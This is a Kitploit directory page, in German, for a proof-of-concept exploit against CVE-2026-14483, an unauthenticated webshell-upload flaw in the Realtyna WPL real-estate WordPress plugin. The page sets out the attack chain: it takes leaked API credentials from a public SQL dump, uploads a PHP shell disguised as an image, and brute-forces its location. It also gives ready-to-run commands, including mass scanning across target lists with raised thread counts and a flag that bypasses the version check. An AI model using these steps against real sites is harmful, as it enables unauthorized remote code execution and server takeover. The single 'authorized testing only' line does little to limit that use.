Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2026-14483 — CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS | Kitploit
Tools/GitHubGitHub/madexploits/cve-2026-14483
Vulnerability AnalysisExploitationWeb Application ExploitationWeb SecurityPenetration TestingPayload Development
GitHubmadexploits/cve-2026-14483

CVE-2026-14483

CVE-2026-14483 POC EXPLOIT BY MADEXPLOITS

Repository anzeigen
1vor 18 TagenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

CVE-2026-14483 — WPL Immobilien RCE

Nicht authentifizierte Remote-Codeausführung gegen das Realtyna WPL Real Estate Listing WordPress-Plugin.

FeldDetail
CVECVE-2026-14483
Betroffene Version<= 5.2.0
Pluginreal-estate-listing-realtyna-wpl
AuswirkungNicht authentifizierter PHP-Webshell-Upload (RCE)
SkriptCVE-2026-14483.py
AutorMADEXPLOITS

Standardmäßig greift das Skript nur Ziele an, die WPL 5.2.0 ausführen. Verwenden Sie --force, um dies zu überschreiben.

BILD


Zusammenfassung der Schwachstellen

  1. Offenlegung von Zugangsdaten — Standard-api_key/api_secret werden über einen öffentlichen SQL-Migrationsdump offengelegt.
  2. Nicht authentifizierter Upload — Diese Zugangsdaten authentifizieren die WPL-I/O-API (set_property), sodass eine manipulierte PHP-Datei als Immobilienbild hochgeladen werden kann.
  3. Webshell-Erkennung — Die hochgeladene Shell befindet sich unter wp-content/uploads/WPL/{property_id}/.

Anforderungen

root@kitploit:~
pip install requests colorama
  • Python 3.8+
  • Netzwerkzugriff auf das/die Ziel(e)

Verwendung

Zielliste

Erstellen Sie eine Textdatei mit einer Basis-URL pro Zeile:

root@kitploit:~
http://wplab.test
https://example.com

Grundlegender Aufruf

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt

Erfolgreiche Shell-URLs werden an result.txt angehängt (oder --output).

Alle Optionen

root@kitploit:~
python CVE-2026-14483.py \
  --targets targets.txt \
  --output result.txt \
  --user-id 1 \
  --max-id 1000 \
  --timeout 30 \
  --threads 5 \
  --debug \
  --force

Exploit-Ablauf

root@kitploit:~
Target URL
    │
    ▼
Detect WPL version (readme.txt / wpl.php)
    │  skip unless == 5.2.0 (or --force)
    ▼
Fetch api_key + api_secret from:
  /wp-content/plugins/real-estate-listing-realtyna-wpl/assets/migrations/basic/1.0.0.sql
    │
    ▼
POST set_property via WPL I/O API
  (upload image_0x89MADEXPLOITS.php as image/jpeg)
    │
    ▼
Brute-force property ID 1..max-id
  /wp-content/uploads/WPL/{id}/0x89MADEXPLOITS.php
    │
    ▼
Write shell URL → output file

Standard-Shell-Marker: MADEXPLOITS
Standard-Remote-Dateiname: 0x89MADEXPLOITS.php


Beispiele

Einzelnes Laborziel (dieser Arbeitsbereich):

root@kitploit:~
echo http://wplab.test > targets.txt
python CVE-2026-14483.py --targets targets.txt --debug

Massen-Scan mit höherer Parallelität:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --threads 20 --output shells.txt

Exploit erzwingen, wenn die Versionsprüfung fehlschlägt:

root@kitploit:~
python CVE-2026-14483.py --targets targets.txt --force

Ausgabe

root@kitploit:~
[+] Shell found: http://target/wp-content/uploads/WPL/32/0x89MADEXPLOITS.php
[*] Progress: 1/1 | Found: 1
[+] Done. Found 1 shell(s). Check 'result.txt' for URLs.

result.txt enthält eine Shell-URL pro Zeile.


Hinweise

  • Die Version wird aus Stable tag: / Version: in der Plugin-Datei readme.txt gelesen, mit Fallback auf wpl.php.
  • Falls die Shell nach dem Upload nicht gefunden wird, erhöhen Sie --max-id.
  • Nur für autorisierte Sicherheitstests / lokale Laborumgebungen vorgesehen.
Tool herunterladen
ArgumentStandardBeschreibung
--targets(erforderlich)Datei mit Basis-URLs (eine pro Zeile)
--outputresult.txtDatei, an die gefundene Shell-URLs angehängt werden
--user-id1WordPress-/WPL-Benutzer-ID, die die neue Immobilie besitzt
--payloadintegrierte Upload-ShellBenutzerdefinierter PHP-Payload-String
--max-id1000Maximale Immobilien-ID zum Durchsuchen (Brute-Force) beim Auffinden der Shell
--timeout30HTTP-Timeout in Sekunden
--threads5Parallele Worker-Threads
--debugoffAusführliche Debug-Protokollierung
--forceoffExploit auch ausführen, wenn Version ≠ 5.2.0 oder Version nicht erkannt werden kann